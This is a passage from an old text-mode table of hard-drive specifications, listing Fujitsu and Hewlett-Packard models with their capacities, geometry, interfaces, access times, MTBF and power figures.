ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2613SA 3.50 HALF 136.6MB 1334 3 6 SCSI RLL(1,7) 25mS 7.4Mb 50K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2613T 3.50 HALF 135.2MB 1334 3 6 IDE(AT) RLL(1,7) 25mS 7.4Mb 30K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2614SA 3.50 HALF 182.4MB 1334 4 8 SCSI RLL(1,7) 25mS 7.4Mb 50K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2614T 3.50 HALF 180.3MB 1334 4 8 IDE(AT) RLL(1,7) 25mS 7.4Mb 30K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M262xSA 3.50 HALF 520.0MB SCSI 12mS 4400 RPM, 240K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M262xT 3.50 HALF 520.0MB IDE(AT) 12mS 4400 RPM, 240K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2241AS 5.25 FULL 26.0MB 754 375 17 2 4 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 12 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. 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ACC RATE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + FUJITSU M2242AS 5.25 FULL 54.9MB 43.0MB 754 375 17 4 7 VC ST412 MFM 760 Y 30mS 5.0Mb 30K 30.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2243AS 5.25 FULL 86.3MB 67.0MB 754 375 17 6 11 VC ST412 MFM 760 Y 30mS 5.0Mb 30K 30.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2243R 5.25 HALF 110.0MB 1186 26 4 7 ST412 RLL(2,7) 25mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2243T 5.25 HALF 68.0MB 1186 17 4 7 ST412 MFM 25mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2244E 5.25 FULL 73.0MB 823 35 3 5 ESDI RLL(2,7) 25mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2244SA 5.25 FULL 73.0MB 823 35 3 5 SCSI RLL(2,7) 25mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2245E 5.25 FULL 120.0MB 823 35 4 7 ESDI RLL(2,7) 25mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2245SA 5.25 FULL 120.0MB 823 35 4 7 SCSI RLL(2,7) 25mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2246E 5.25 FULL 172.0MB 138.0MB 823 35 6 10 ESDI RLL(2,7) 850 25mS 10.0Mb 30K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2246SA 5.25 FULL 172.0MB 138.0MB 823 35 6 10 SCSI RLL(2,7) 850 25mS 10.0Mb 30K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2249E 5.25 FULL 389.0MB 1243 8 15 ESDI RLL(1,7) 850 18mS 10.0Mb 30K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2249S 5.25 FULL 389.0MB 1243 8 15 SCSI RLL(1,7) 850 18mS 10.0Mb 30K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2261E 5.25 FULL 415.0MB 321.0MB 1658 * 8 ESDI RLL(2,7) 16mS 15.0Mb 200K 34.0W *24-96, 64B CAC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2261S 5.25 FULL 415.0MB 321.0MB 1658 8 SCSI RLL(2,7) 16mS 40.0Mb 200K 34.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2263E 5.25 FULL 778.0MB 650.0MB 1658 * 8 15 ESDI RLL(1,7) 1726 16mS 15.0Mb 200K 28.0W *24-96, 64B CAC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2263S 5.25 FULL 778.0MB 650.0MB 1658 8 15 SCSI RLL(1,7) 1726 16mS 40.0Mb 200K 28.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU M2266SA 5.25 FULL 1266.0MB SCSI RLL Y 15mS 24.0Mb 200K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FULITSU M2247E 5.25 FULL 1243 4 7 ESDI RLL(2,7) + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97500-85600 3.50 HALF 20.0MB SCSI + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97500-85620 3.50 HALF 20.0MB SCSI + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-C2233S 3.50 HALF 281.0MB 234.0MB 1511 49 3 5 VC SCSI-2 RLL(ZBR) 1850 Y 13mS 16.0Mb 150K 12.3W 64K BUF,R/S ECC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-C2234S 3.50 HALF 394.0MB 328.0MB 1511 64 4 7 VC SCSI-2 RLL(ZBR) 1850 Y 13mS 16.0Mb 150K 12.3W 64K BUF,R/S ECC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-C2235S 3.50 HALF 506.0MB 422.0MB 1511 72 5 9 VC SCSI-2 RLL(ZBR) 1850 Y 13mS 16.0Mb 150K 12.3W 64K BUF,R/S ECC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97530E 5.25 FULL 136.0MB 2 4 VC ESDI RLL(2,7) 1590 Y 18mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97530S 5.25 FULL 204.0MB 3 6 VC SCSI RLL(2,7) 1590 Y 18mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97532E 5.25 FULL 103.0MB VC ESDI RLL(2,7) Y 17mS 10.0Mb 99K 19.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97533E 5.25 FULL 155.0MB VC ESDI RLL(2,7) Y 17mS 10.0Mb 99K 27.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97536E 5.25 FULL 311.0MB VC ESDI RLL(2,7) Y 17mS 10.0Mb 99K 30.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 13 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. HGT. UNFORMAT FORMATED CYLS COMP TK PL HD AC FACE METHOD IN. P? ACC RATE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + HEWLETT-PKD. HP-97544E 5.25 FULL 397.0MB 340.0MB 4 8 VC ESDI RLL(2,7) Y 17mS 20.0Mb 150K 21.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97544S/D 5.25 FULL 397.0MB 331.0MB 4 8 VC SCSI RLL(2,7) Y 17mS 20.0Mb 150K 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97544T/P 5.25 FULL 397.0MB 331.0MB 4 8 VC SCSI-2 RLL(2,7) Y 17mS 20.0Mb 150K 4002RPM,R/S ECC + 